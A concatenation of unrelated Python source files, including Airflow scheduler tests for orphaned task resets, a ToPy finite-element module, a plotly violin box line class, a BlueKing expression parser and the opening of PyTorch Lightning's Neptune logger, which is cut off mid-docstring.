shutil.rmtree(dags_folder)
# Rerun the scheduler once the dag file has been removed
self.run_single_scheduler_loop_with_no_dags(dags_folder)
session = settings.Session()
import_errors = session.query(models.ImportError).all()
self.assertEqual(len(import_errors), 0)
def test_list_py_file_paths(self):
"""
[JIRA-1357] Test the 'list_py_file_paths' function used by the
scheduler to list and load DAGs.
"""
detected_files = []
expected_files = []
for file_name in os.listdir(TEST_DAGS_FOLDER):
if file_name.endswith('.py') or file_name.endswith('.zip'):
if file_name not in ['no_dags.py']:
expected_files.append(
'{}/{}'.format(TEST_DAGS_FOLDER, file_name))
for file_path in list_py_file_paths(TEST_DAGS_FOLDER):
detected_files.append(file_path)
self.assertEqual(sorted(detected_files), sorted(expected_files))
def test_reset_orphaned_tasks_nothing(self):
"""Try with nothing. """
scheduler = SchedulerJob()
session = settings.Session()
self.assertEqual(
0, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
def test_reset_orphaned_tasks_external_triggered_dag(self):
dag_id = 'test_reset_orphaned_tasks_external_triggered_dag'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
task_id = dag_id + '_task'
DummyOperator(task_id=task_id, dag=dag)
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag, session=session)
ti = dr1.get_task_instances(session=session)[0]
dr1.state = State.RUNNING
ti.state = State.SCHEDULED
dr1.external_trigger = True
session.merge(ti)
session.merge(dr1)
session.commit()
reset_tis = scheduler.reset_state_for_orphaned_tasks(session=session)
self.assertEquals(1, len(reset_tis))
def test_reset_orphaned_tasks_backfill_dag(self):
dag_id = 'test_reset_orphaned_tasks_backfill_dag'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
task_id = dag_id + '_task'
DummyOperator(task_id=task_id, dag=dag)
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag, session=session)
ti = dr1.get_task_instances(session=session)[0]
ti.state = State.SCHEDULED
dr1.state = State.RUNNING
dr1.run_id = BackfillJob.ID_PREFIX + '_sdfsfdfsd'
session.merge(ti)
session.merge(dr1)
session.commit()
self.assertTrue(dr1.is_backfill)
self.assertEquals(0, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
def test_reset_orphaned_tasks_specified_dagrun(self):
"""Try to reset when we specify a dagrun and ensure nothing else is."""
dag_id = 'test_reset_orphaned_tasks_specified_dagrun'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
task_id = dag_id + '_task'
DummyOperator(task_id=task_id, dag=dag)
scheduler = SchedulerJob()
session = settings.Session()
# make two dagruns, only reset for one
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr1.state = State.SUCCESS
dr2.state = State.RUNNING
ti1 = dr1.get_task_instances(session=session)[0]
ti2 = dr2.get_task_instances(session=session)[0]
ti1.state = State.SCHEDULED
ti2.state = State.SCHEDULED
session.merge(ti1)
session.merge(ti2)
session.merge(dr1)
session.merge(dr2)
session.commit()
reset_tis = scheduler.reset_state_for_orphaned_tasks(filter_by_dag_run=dr2, session=session)
self.assertEquals(1, len(reset_tis))
ti1.refresh_from_db(session=session)
ti2.refresh_from_db(session=session)
self.assertEquals(State.SCHEDULED, ti1.state)
self.assertEquals(State.NONE, ti2.state)
def test_reset_orphaned_tasks_nonexistent_dagrun(self):
"""Make sure a task in an orphaned state is not reset if it has no dagrun. """
dag_id = 'test_reset_orphaned_tasks_nonexistent_dagrun'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
task_id = dag_id + '_task'
task = DummyOperator(task_id=task_id, dag=dag)
scheduler = SchedulerJob()
session = settings.Session()
ti = models.TaskInstance(task=task, execution_date=DEFAULT_DATE)
session.add(ti)
session.commit()
ti.refresh_from_db()
ti.state = State.SCHEDULED
session.merge(ti)
session.commit()
self.assertEquals(0, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
def test_reset_orphaned_tasks_no_orphans(self):
dag_id = 'test_reset_orphaned_tasks_no_orphans'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
task_id = dag_id + '_task'
DummyOperator(task_id=task_id, dag=dag)
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr1.state = State.RUNNING
tis = dr1.get_task_instances(session=session)
tis[0].state = State.RUNNING
session.merge(dr1)
session.merge(tis[0])
session.commit()
self.assertEquals(0, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
tis[0].refresh_from_db()
self.assertEquals(State.RUNNING, tis[0].state)
def test_reset_orphaned_tasks_non_running_dagruns(self):
"""Ensure orphaned tasks with non-running dagruns are not reset."""
dag_id = 'test_reset_orphaned_tasks_non_running_dagruns'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
task_id = dag_id + '_task'
DummyOperator(task_id=task_id, dag=dag)
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr1.state = State.SUCCESS
tis = dr1.get_task_instances(session=session)
self.assertEquals(1, len(tis))
tis[0].state = State.SCHEDULED
session.merge(dr1)
session.merge(tis[0])
session.commit()
self.assertEquals(0, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
def test_reset_orphaned_tasks_with_orphans(self):
"""Create dagruns and esnure only ones with correct states are reset."""
prefix = 'scheduler_job_test_test_reset_orphaned_tasks'
states = [State.QUEUED, State.SCHEDULED, State.NONE, State.RUNNING, State.SUCCESS]
states_to_reset = [State.QUEUED, State.SCHEDULED, State.NONE]
dag = DAG(dag_id=prefix,
start_date=DEFAULT_DATE,
schedule_interval="@daily")
tasks = []
for i in range(len(states)):
task_id = "{}_task_{}".format(prefix, i)
task = DummyOperator(task_id=task_id, dag=dag)
tasks.append(task)
scheduler = SchedulerJob()
session = settings.Session()
# create dagruns
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr1.state = State.RUNNING
dr2.state = State.SUCCESS
session.merge(dr1)
session.merge(dr2)
session.commit()
# create taskinstances and set states
dr1_tis = []
dr2_tis = []
for i, (task, state) in enumerate(zip(tasks, states)):
ti1 = TI(task, dr1.execution_date)
ti2 = TI(task, dr2.execution_date)
ti1.refresh_from_db()
ti2.refresh_from_db()
ti1.state = state
ti2.state = state
dr1_tis.append(ti1)
dr2_tis.append(ti2)
session.merge(ti1)
session.merge(ti2)
session.commit()
self.assertEqual(2, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
for ti in dr1_tis + dr2_tis:
ti.refresh_from_db()
# running dagrun should be reset
for state, ti in zip(states, dr1_tis):
if state in states_to_reset:
self.assertIsNone(ti.state)
else:
self.assertEqual(state, ti.state)
# tasks of the non-running (successful) dagrun should not be reset
for state, ti in zip(states, dr2_tis):
self.assertEqual(state, ti.state)
for state, ti in zip(states, dr1_tis):
ti.state = state
session.commit()
scheduler.reset_state_for_orphaned_tasks(filter_by_dag_run=dr1, session=session)
# the dagrun-filtered reset should likewise leave the other dagrun's tasks untouched
for state, ti in zip(states, dr2_tis):
self.assertEqual(state, ti.state)
session.close()
|
py | 7df7ece84a9e809f17b67115d733660bd86a1622 | def foo(b):
pass |
py | 7df7eec0a88420701d7ae7522145f02ea838413a | """
# =============================================================================
# Finite element stiffness matrices.
#
# To define your own finite elements, see Python scripts in 'data' directory.
#
# Author: William Hunter
# Copyright (C) 2008, 2015, William Hunter.
# =============================================================================
"""
from os import path
from numpy import array, linspace, unique, sqrt, round, load
from numpy.linalg import eigvalsh
from .utils import get_logger
from .data.matlcons import _a, _nu, _E
logger = get_logger(__name__)
__all__ = ['Q4', 'Q5B', 'Q4a5B', 'Q4T',\
'H8', 'H18B', 'H8T']
# ===================================================
# === Messages used for errors, information, etc. ===
# ===================================================
MSG0 = 'finite element stiffness matrix.'
MSG1 = 'Element stiffness matrices do not exist.\n Created... Please re-run \
your last attempt.'
# Set path to data folder:
pth = path.join(path.split(__file__)[0], 'data')
# 2D elements
# #############################################################################
# ==============================================
# === KBar of Q4, see De Klerk and Groenwold ===
# ==============================================
fname = path.join(pth, 'Q4bar.K')
try:
Q4bar = load(fname)
except IOError:
logger.info('It seems as though all or some of the element stiffness matrices')
logger.info('do not exist. Creating them...')
logger.info('This is usually only required once and may take a few minutes.')
from topy.data import Q4bar_K
Q4bar = load(fname)
# ==========================================================================
# === Stiffness matrix of a square 4 node plane stress bi-linear element ===
# ==========================================================================
fname = path.join(pth, 'Q4.K')
try:
Q4 = load(fname)
except IOError:
from topy.data import Q4_K
Q4 = load(fname)
# =========================================================================
# === Stiffness matrix of a square 4 node plane stress '5-beta' element ===
# =========================================================================
fname = path.join(pth, 'Q5B.K')
try:
Q5B = load(fname)
except IOError:
from topy.data import Q5B_K
Q5B = load(fname)
# =========================================================
# === Matrix for an element used in 2D thermal problems ===
# =========================================================
fname = path.join(pth, 'Q4T.K')
try:
Q4T = load(fname)
except IOError:
from topy.data import Q4T_K
Q4T = load(fname)
# ===========================================================
# === Stiffness matrix of a square 4 node 'Q4a5B' element ===
# ===========================================================
# This element is based on the '5-beta' assumed stress element for plane
# stress, but elemental parameters are introduced and selected such that
# spurious zero energy modes are not introduced, for which an investigation
# of characteristic equations of the elemental stiffness matrix is needed.
# Element thickness set = 1. See De Klerk and Groenwold for details.
# Symbolic value of alpha_opt for bending:
alpha2D = (2 * _a**2 * (1 - _nu) * (2 * _nu**2 - _nu + 1)) \
/ (3 * (_nu + 1) * _E**2)
Q4a5B = Q4 - alpha2D * _E * Q4bar # stiffness matrix
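# Editorial note (illustrative sketch, not part of the original module): one way to
# sanity-check that no spurious zero-energy modes were introduced is to inspect the
# eigenvalue spectrum of the element stiffness matrix; a 4-node plane element should
# have exactly three near-zero eigenvalues (two rigid translations and one rigid
# rotation). The tolerance below is an arbitrary illustrative choice:
#   rigid_modes = (abs(eigvalsh(Q4a5B)) < 1e-9 * abs(eigvalsh(Q4a5B)).max()).sum()
#   assert rigid_modes == 3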
# 3D elements
# #############################################################################
# ======================================================================
# === Stiffness matrix for a hexahedron 8 node tri-linear 3D element ===
# ======================================================================
fname = path.join(pth, 'H8.K')
try:
H8 = load(fname)
except IOError:
from topy.data import H8_K
H8 = load(fname)
# ============================================================
# === Stiffness matrix of a cubic 8 node '18-beta' element ===
# ============================================================
fname = path.join(pth, 'H18B.K')
try:
H18B = load(fname)
except IOError:
from topy.data import H18B_K
H18B = load(fname)
# ==========================================================================
# === Stiffness matrix for a hexahedron 8 node tri-linear 3D element for ===
# === thermal problems. ===
# ==========================================================================
fname = path.join(pth, 'H8T.K')
try:
H8T = load(fname)
except IOError:
from topy.data import H8T_K
H8T = load(fname)
# EOF elements.py
|
py | 7df7ef3022a9d9bbe5019ad5f14c3061d2fa9243 | import sys
from . import tools
sys.path.insert(0, '')
sys.path.extend(['../'])
num_node = 15
self_link = [(i, i) for i in range(num_node)]
inward_ori_index = [(1, 2), (2, 4), (2, 7), (2, 3), (5, 4), (6, 5),
(8, 7), (9, 8), (13, 3), (13, 14), (14, 15), (3, 10),
(10, 11), (11, 12)]
inward = [(i - 1, j - 1) for (i, j) in inward_ori_index]
outward = [(j, i) for (i, j) in inward]
neighbor = inward + outward
class AdjMatrixGraph:
def __init__(self, *args, **kwargs):
self.edges = neighbor
self.num_nodes = num_node
self.self_loops = [(i, i) for i in range(self.num_nodes)]
self.inward = inward
self.outward = outward
self.neighbor = neighbor
self.A_binary = tools.get_adjacency_matrix(self.edges, self.num_nodes)
self.A_binary_with_I = tools.get_adjacency_matrix(self.edges + self.self_loops, self.num_nodes)
self.A = tools.normalize_adjacency_matrix(self.A_binary)
self.A_with_I = tools.normalize_adjacency_matrix(self.A_binary_with_I)
self.Spatial_A = tools.get_spatial_graph(num_node, self_link, inward, outward)
if __name__ == '__main__':
import matplotlib.pyplot as plt
graph = AdjMatrixGraph()
A, A_binary, A_binary_with_I, spaA = graph.A, graph.A_binary, graph.A_binary_with_I, graph.Spatial_A
f, ax = plt.subplots(1, 3)
ax[0].imshow(A_binary_with_I, cmap='gray')
ax[1].imshow(A_binary, cmap='gray')
ax[2].imshow(A, cmap='gray')
plt.show()
print(A_binary_with_I)
for i in spaA:
plt.imshow(i, cmap='gray')
plt.show()
print(spaA.shape)
|
py | 7df7f09d850728c8d08f97ee2c08c7db5daf63e1 | from .primes import * # noqa
|
py | 7df7f1863f31daadeedc5f069717f386a5dadd4d | from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class Line(_BaseTraceHierarchyType):
# class properties
# --------------------
_parent_path_str = "violin.box"
_path_str = "violin.box.line"
_valid_props = {"color", "width"}
# color
# -----
@property
def color(self):
"""
Sets the inner box plot bounding line color.
The 'color' property is a color and may be specified as:
- A hex string (e.g. '#ff0000')
- An rgb/rgba string (e.g. 'rgb(255,0,0)')
- An hsl/hsla string (e.g. 'hsl(0,100%,50%)')
- An hsv/hsva string (e.g. 'hsv(0,100%,100%)')
- A named CSS color:
aliceblue, antiquewhite, aqua, aquamarine, azure,
beige, bisque, black, blanchedalmond, blue,
blueviolet, brown, burlywood, cadetblue,
chartreuse, chocolate, coral, cornflowerblue,
cornsilk, crimson, cyan, darkblue, darkcyan,
darkgoldenrod, darkgray, darkgrey, darkgreen,
darkkhaki, darkmagenta, darkolivegreen, darkorange,
darkorchid, darkred, darksalmon, darkseagreen,
darkslateblue, darkslategray, darkslategrey,
darkturquoise, darkviolet, deeppink, deepskyblue,
dimgray, dimgrey, dodgerblue, firebrick,
floralwhite, forestgreen, fuchsia, gainsboro,
ghostwhite, gold, goldenrod, gray, grey, green,
greenyellow, honeydew, hotpink, indianred, indigo,
ivory, khaki, lavender, lavenderblush, lawngreen,
lemonchiffon, lightblue, lightcoral, lightcyan,
lightgoldenrodyellow, lightgray, lightgrey,
lightgreen, lightpink, lightsalmon, lightseagreen,
lightskyblue, lightslategray, lightslategrey,
lightsteelblue, lightyellow, lime, limegreen,
linen, magenta, maroon, mediumaquamarine,
mediumblue, mediumorchid, mediumpurple,
mediumseagreen, mediumslateblue, mediumspringgreen,
mediumturquoise, mediumvioletred, midnightblue,
mintcream, mistyrose, moccasin, navajowhite, navy,
oldlace, olive, olivedrab, orange, orangered,
orchid, palegoldenrod, palegreen, paleturquoise,
palevioletred, papayawhip, peachpuff, peru, pink,
plum, powderblue, purple, red, rosybrown,
royalblue, rebeccapurple, saddlebrown, salmon,
sandybrown, seagreen, seashell, sienna, silver,
skyblue, slateblue, slategray, slategrey, snow,
springgreen, steelblue, tan, teal, thistle, tomato,
turquoise, violet, wheat, white, whitesmoke,
yellow, yellowgreen
Returns
-------
str
"""
return self["color"]
@color.setter
def color(self, val):
self["color"] = val
# width
# -----
@property
def width(self):
"""
Sets the inner box plot bounding line width.
The 'width' property is a number and may be specified as:
- An int or float in the interval [0, inf]
Returns
-------
int|float
"""
return self["width"]
@width.setter
def width(self, val):
self["width"] = val
# Self properties description
# ---------------------------
@property
def _prop_descriptions(self):
return """\
color
Sets the inner box plot bounding line color.
width
Sets the inner box plot bounding line width.
"""
def __init__(self, arg=None, color=None, width=None, **kwargs):
"""
Construct a new Line object
Parameters
----------
arg
dict of properties compatible with this constructor or
an instance of
:class:`new_plotly.graph_objs.violin.box.Line`
color
Sets the inner box plot bounding line color.
width
Sets the inner box plot bounding line width.
Returns
-------
Line
"""
super(Line, self).__init__("line")
if "_parent" in kwargs:
self._parent = kwargs["_parent"]
return
# Validate arg
# ------------
if arg is None:
arg = {}
elif isinstance(arg, self.__class__):
arg = arg.to_plotly_json()
elif isinstance(arg, dict):
arg = _copy.copy(arg)
else:
raise ValueError(
"""\
The first argument to the new_plotly.graph_objs.violin.box.Line
constructor must be a dict or
an instance of :class:`new_plotly.graph_objs.violin.box.Line`"""
)
# Handle skip_invalid
# -------------------
self._skip_invalid = kwargs.pop("skip_invalid", False)
self._validate = kwargs.pop("_validate", True)
# Populate data dict with properties
# ----------------------------------
_v = arg.pop("color", None)
_v = color if color is not None else _v
if _v is not None:
self["color"] = _v
_v = arg.pop("width", None)
_v = width if width is not None else _v
if _v is not None:
self["width"] = _v
# Process unknown kwargs
# ----------------------
self._process_kwargs(**dict(arg, **kwargs))
# Reset skip_invalid
# ------------------
self._skip_invalid = False
|
py | 7df7f46cc5230371745f8da672dbf40452ee05c2 | # -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making 蓝鲸 (Blueking) available.
Copyright (C) 2017-2021 THL A29 Limited, a Tencent company. All rights reserved.
Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License.
You may obtain a copy of the License at https://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on
an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and limitations under the License.
"""
from typing import List, Tuple, Union
from django.utils.translation import ugettext_lazy as _
from common.log import logger
from apps.gsekit.utils.expression_utils.range2re import range2re
from apps.gsekit.utils.expression_utils.exceptions import (
ExpressionSyntaxException,
ExpressionBaseException,
ExpressionParseException,
)
class MatchType:
WORD = 0
RANGE = 1
WORD_LIST = 2
BUILD_IN_ENUM = 3
BUILD_IN_EXCLUDE = 4
class BuildInChar:
COMMA = ","
HYPHEN = "-"
LEFT_BRACKET = "["
RIGHT_BRACKET = "]"
# Wildcard characters
ASTERISK = "*"
EXCLAMATION = "!"
def parse_list2expr(value_list: List) -> str:
deduplicated = set(value_list)
if len(deduplicated) == 1:
return str(list(deduplicated)[0])
return "[" + ",".join([str(value) for value in compressed_list(deduplicated)]) + "]"
def compressed_list(value_list: iter) -> List[str]:
deduplicated = set([str(value) for value in value_list])
number_values = sorted([value for value in deduplicated if value.isdecimal()])
no_number_values = deduplicated - set(number_values)
left, right = 0, 0
str_range_set = set()
while right < len(number_values) - 1:
if int(number_values[right]) + 1 == int(number_values[right + 1]):
right = right + 1
else:
str_range_set.add(number_values[left] if left == right else f"{number_values[left]}-{number_values[right]}")
left, right = right + 1, right + 1
if len(number_values) != 0:
str_range_set.add(number_values[left] if left == right else f"{number_values[left]}-{number_values[right]}")
return list(str_range_set | no_number_values)
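# Illustrative usage (editorial sketch, not part of the original module):
# compressed_list collapses consecutive integers into "begin-end" ranges and keeps
# non-numeric values as-is; parse_list2expr then wraps multiple values into an enum
# expression such as "[1-3,5]" (element order may vary because sets are used).
#   >>> sorted(compressed_list([1, 2, 3, 5, "web"]))
#   ['1-3', '5', 'web']
#   >>> parse_list2expr([8, 8, 8])
#   '8'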
def expand_list_element(nested_list: Union[List[List], str]) -> List[str]:
"""将嵌套数组元素全部展开为一维数组"""
expand_str_list = []
for child in nested_list:
if isinstance(child, list):
expand_str_list.extend(expand_list_element(child))
else:
expand_str_list.append(child)
if isinstance(nested_list, str):
return [nested_list]
return expand_str_list
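# Illustrative behaviour (editorial sketch, not part of the original module):
# nested lists are flattened depth-first, while a bare string is returned as a
# single-element list rather than being split into characters. Roughly:
#   >>> expand_list_element([["a"], [["b"], "c"]])
#   ['a', 'b', 'c']
#   >>> expand_list_element("web")
#   ['web']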
def get_range_scope(range_expression: str) -> Tuple[str, str]:
range_list = range_expression.split(BuildInChar.HYPHEN)
return range_list[0], range_list[1]
def is_range_format(expression: str) -> bool:
"""判断表达式是否为范围表达式"""
range_list = expression.split(BuildInChar.HYPHEN)
if len(range_list) != 2:
return False
return True
def is_single_alpha_range(range_expression: str) -> bool:
"""判断表达式是否为单字符范围"""
begin, end = get_range_scope(range_expression)
if begin.islower() != end.islower():
return False
if len(begin) == 1 and len(end) == 1 and begin.isalpha() and end.isalpha() and ord(begin) < ord(end):
return True
return False
def is_number_range(range_expression: str) -> bool:
"""判断表达式是否为数字范围"""
begin, end = get_range_scope(range_expression)
if begin.isdecimal() and end.isdecimal() and int(begin) < int(end):
return True
return False
def get_match_type(expression: str) -> int:
"""获取表达式类型"""
if expression.startswith(BuildInChar.LEFT_BRACKET) and expression.endswith(BuildInChar.RIGHT_BRACKET):
return MatchType.BUILD_IN_ENUM
elif expression.startswith(BuildInChar.EXCLAMATION):
return MatchType.BUILD_IN_EXCLUDE
elif BuildInChar.COMMA in expression:
return MatchType.WORD_LIST
elif BuildInChar.HYPHEN in expression:
if is_range_format(expression):
if is_single_alpha_range(expression) or is_number_range(expression):
return MatchType.RANGE
return MatchType.WORD
else:
return MatchType.WORD
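# Illustrative classification (editorial sketch, not part of the original module);
# the returned values are the plain ints defined on MatchType:
#   get_match_type("[1-3,web]")  -> MatchType.BUILD_IN_ENUM
#   get_match_type("!dev")       -> MatchType.BUILD_IN_EXCLUDE
#   get_match_type("a,b,c")      -> MatchType.WORD_LIST
#   get_match_type("1-5")        -> MatchType.RANGE
#   get_match_type("my-service") -> MatchType.WORD  (hyphen present but not a valid range)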
def parse_enum_expression(enum_expression: str) -> List:
"""解析枚举表达式,获取枚举值"""
match_status_func = {
MatchType.WORD: lambda x: [x],
MatchType.BUILD_IN_ENUM: lambda x: [x],
MatchType.BUILD_IN_EXCLUDE: lambda x: f"[{x}]",
MatchType.WORD_LIST: parse_word_list_expression,
MatchType.RANGE: parse_range_expression,
}
match_type = get_match_type(enum_expression)
sub_expressions = match_status_func[match_type](enum_expression)
if match_type in [MatchType.WORD, MatchType.BUILD_IN_ENUM, MatchType.BUILD_IN_EXCLUDE]:
return match_status_func[match_type](enum_expression)
return [parse_enum_expression(sub_expression) for sub_expression in sub_expressions]
def parse_word_list_expression(word_list_expression: str) -> List[str]:
elements = word_list_expression.split(BuildInChar.COMMA)
return [element.strip() for element in elements]
def parse_range_expression(range_expression: str) -> List[str]:
if is_single_alpha_range(range_expression):
return [f"[{range_expression}]"]
if is_number_range(range_expression):
begin, end = get_range_scope(range_expression)
return range2re(int(begin), int(end))
raise ExpressionSyntaxException(_("范围表达式解析错误: {range_expression}").format(range_expression=range_expression))
def parse_exp2unix_shell_style_main(expression: str) -> List[str]:
"""将表达式解析为若干unix shell风格的匹配式"""
expressions_parsed = [""]
last_enum_end = -1
enum_begin = expression.find(BuildInChar.LEFT_BRACKET)
# Pre-process enumerations of the form [...]
while enum_begin != -1:
enum_end = expression.find(BuildInChar.RIGHT_BRACKET, enum_begin)
if enum_end == -1:
raise ExpressionSyntaxException(
_("枚举表达式缺少`]`: {error_expression}").format(error_expression=expression[enum_begin:])
)
enum_expression = expression[enum_begin : enum_end + 1]
# Expand the enumerated values
enum_value_list = expand_list_element(parse_enum_expression(enum_expression[1:-1]))
# Append each enumerated value to the end of the current prefix
sub_expressions_parsed = [
f"{expression[last_enum_end + 1: enum_begin]}{enum_value}" for enum_value in enum_value_list
]
# Combine with the expressions parsed so far
expressions_parsed = [
f"{exp_prefix}{sub_exp}" for exp_prefix in expressions_parsed for sub_exp in sub_expressions_parsed
]
last_enum_end = enum_end
enum_begin = expression.find(BuildInChar.LEFT_BRACKET, enum_end)
expressions_parsed = [f"{exp_prefix}{expression[last_enum_end + 1:]}" for exp_prefix in expressions_parsed]
return expressions_parsed
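# Illustrative expansion (editorial sketch, not part of the original module):
# enum parts are expanded into plain Unix-shell-style (fnmatch) patterns, e.g.
#   >>> parse_exp2unix_shell_style_main("proc[1,3]_*")
#   ['proc1_*', 'proc3_*']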
def parse_exp2unix_shell_style(expression: str) -> List[str]:
try:
return list(set(parse_exp2unix_shell_style_main(expression)))
except ExpressionBaseException:
raise
except Exception as err:
msg = _("表达式[{expression}]解析异常:{err}".format(expression=expression, err=repr(err)))
logger.error(msg)
raise ExpressionParseException(msg) from err
|
py | 7df7f5599ce311663875a8c91067aea718df7385 | # Copyright The PyTorch Lightning team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Neptune Logger
--------------
"""
__all__ = [
"NeptuneLogger",
]
import logging
import os
import warnings
from argparse import Namespace
from functools import reduce
from typing import Any, Callable, Dict, Generator, Mapping, Optional, Sequence, Set, Union
from weakref import ReferenceType
import torch
from pytorch_lightning import __version__
from pytorch_lightning.callbacks.model_checkpoint import ModelCheckpoint
from pytorch_lightning.loggers.logger import Logger, rank_zero_experiment
from pytorch_lightning.utilities.imports import _NEPTUNE_AVAILABLE, _NEPTUNE_GREATER_EQUAL_0_9
from pytorch_lightning.utilities.logger import _add_prefix, _convert_params, _sanitize_callable_params
from pytorch_lightning.utilities.model_summary import ModelSummary
from pytorch_lightning.utilities.rank_zero import rank_zero_only
if _NEPTUNE_AVAILABLE and _NEPTUNE_GREATER_EQUAL_0_9:
try:
from neptune import new as neptune
from neptune.new.exceptions import NeptuneLegacyProjectException, NeptuneOfflineModeFetchException
from neptune.new.run import Run
from neptune.new.types import File as NeptuneFile
except ModuleNotFoundError:
import neptune
from neptune.exceptions import NeptuneLegacyProjectException, NeptuneOfflineModeFetchException
from neptune.run import Run
from neptune.types import File as NeptuneFile
else:
# needed for test mocks, and function signatures
neptune, Run, NeptuneFile = None, None, None
log = logging.getLogger(__name__)
_INTEGRATION_VERSION_KEY = "source_code/integrations/pytorch-lightning"
# kwargs used in previous NeptuneLogger version, now deprecated
_LEGACY_NEPTUNE_INIT_KWARGS = [
"project_name",
"offline_mode",
"experiment_name",
"experiment_id",
"params",
"properties",
"upload_source_files",
"abort_callback",
"logger",
"upload_stdout",
"upload_stderr",
"send_hardware_metrics",
"run_monitoring_thread",
"handle_uncaught_exceptions",
"git_info",
"hostname",
"notebook_id",
"notebook_path",
]
# kwargs used in legacy NeptuneLogger from neptune-pytorch-lightning package
_LEGACY_NEPTUNE_LOGGER_KWARGS = [
"base_namespace",
"close_after_fit",
]
class NeptuneLogger(Logger):
r"""
Log using `Neptune <https://neptune.ai>`_.
Install it with pip:
.. code-block:: bash
pip install neptune-client
or conda:
.. code-block:: bash
conda install -c conda-forge neptune-client
**Quickstart**
Pass NeptuneLogger instance to the Trainer to log metadata with Neptune:
.. code-block:: python
from pytorch_lightning import Trainer
from pytorch_lightning.loggers import NeptuneLogger
neptune_logger = NeptuneLogger(
api_key="ANONYMOUS", # replace with your own
project="common/pytorch-lightning-integration", # format "<WORKSPACE/PROJECT>"
tags=["training", "resnet"], # optional
)
trainer = Trainer(max_epochs=10, logger=neptune_logger)
**How to use NeptuneLogger?**
Use the logger anywhere in your :class:`~pytorch_lightning.core.lightning.LightningModule` as follows:
.. code-block:: python
from neptune.new.types import File
from pytorch_lightning import LightningModule
class LitModel(LightningModule):
def training_step(self, batch, batch_idx):
# log metrics
loss = ...
self.log("train/loss", loss)
def any_lightning_module_function_or_hook(self):
# log images
img = ...
self.logger.experiment["train/misclassified_images"].log(File.as_image(img))
# generic recipe
metadata = ...
self.logger.experiment["your/metadata/structure"].log(metadata)
Note that the syntax ``self.logger.experiment["your/metadata/structure"].log(metadata)`` is specific to Neptune
and it extends logger capabilities. Specifically, it allows you to log various types of metadata
like scores, files, images, interactive visuals, CSVs, etc.
Refer to the `Neptune docs <https://docs.neptune.ai/you-should-know/logging-metadata#essential-logging-methods>`_
for more detailed explanations.
You can also use regular logger methods ``log_metrics()``, and ``log_hyperparams()`` with NeptuneLogger
as these are also supported.
**Log after fitting or testing is finished**
You can log objects after the fitting or testing methods are finished:
.. code-block:: python
neptune_logger = NeptuneLogger(project="common/pytorch-lightning-integration")
trainer = pl.Trainer(logger=neptune_logger)
model = ...
datamodule = ...
trainer.fit(model, datamodule=datamodule)
trainer.test(model, datamodule=datamodule)
# Log objects after `fit` or `test` methods
# model summary
neptune_logger.log_model_summary(model=model, max_depth=-1)
# generic recipe
metadata = ...
neptune_logger.experiment["your/metadata/structure"].log(metadata)
**Log model checkpoints**
If you have :class:`~pytorch_lightning.callbacks.ModelCheckpoint` configured,
Neptune logger automatically logs model checkpoints.
Model weights will be uploaded to the: "model/checkpoints" namespace in the Neptune Run.
You can disable this option:
.. code-block:: python
neptune_logger = NeptuneLogger(project="common/pytorch-lightning-integration", log_model_checkpoints=False)
**Pass additional parameters to the Neptune run**
You can also pass ``neptune_run_kwargs`` to specify the run in greater detail, for example ``tags`` or ``description``:
.. testcode::
from pytorch_lightning import Trainer
from pytorch_lightning.loggers import NeptuneLogger
neptune_logger = NeptuneLogger(
project="common/pytorch-lightning-integration",
name="lightning-run",
description="mlp quick run with pytorch-lightning",
tags=["mlp", "quick-run"],
)
trainer = Trainer(max_epochs=3, logger=neptune_logger)
Check `run documentation <https://docs.neptune.ai/essentials/api-reference/run>`_
for more info about additional run parameters.
**Details about Neptune run structure**
Runs can be viewed as nested dictionary-like structures that you can define in your code.
Thanks to this you can easily organize your metadata in a way that is most convenient for you.
The hierarchical structure that you apply to your metadata will be reflected later in the UI.
You can organize any type of metadata this way - images, parameters, metrics, model checkpoints, CSV files, etc.
See Also:
- Read about
`what object you can log to Neptune <https://docs.neptune.ai/you-should-know/what-can-you-log-and-display>`_.
- Check `example run <https://app.neptune.ai/o/common/org/pytorch-lightning-integration/e/PTL-1/all>`_
with multiple types of metadata logged.
- For more detailed info check
`user guide <https://docs.neptune.ai/integrations-and-supported-tools/model-training/pytorch-lightning>`_.
Args:
api_key: Optional.
Neptune API token, found on https://neptune.ai upon registration.
Read: `how to find and set Neptune API token <https://docs.neptune.ai/administration/security-and-privacy/
how-to-find-and-set-neptune-api-token>`_.
It is recommended to keep it in the `NEPTUNE_API_TOKEN`
environment variable and then you can drop ``api_key=None``.
project: Optional.
Name of a project in a form of "my_workspace/my_project" for example "tom/mask-rcnn".
